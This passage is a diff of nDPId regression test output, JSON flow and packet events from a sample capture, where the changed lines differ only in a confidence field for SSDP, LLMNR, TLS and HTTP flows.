-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1470104381626,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381626,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7AAAAERvz3AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104381935,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0MAAAERi63AqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104381935,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUIAAAERlcbAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRQAAAQRv1\/AqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiEAAAERhV\/AqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"} 
-01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1470104382036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382036,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0UAAAERi6vAqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1470104382038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382038,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUUAAAERlcPAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"} -01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} -01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} 
+01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} +01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
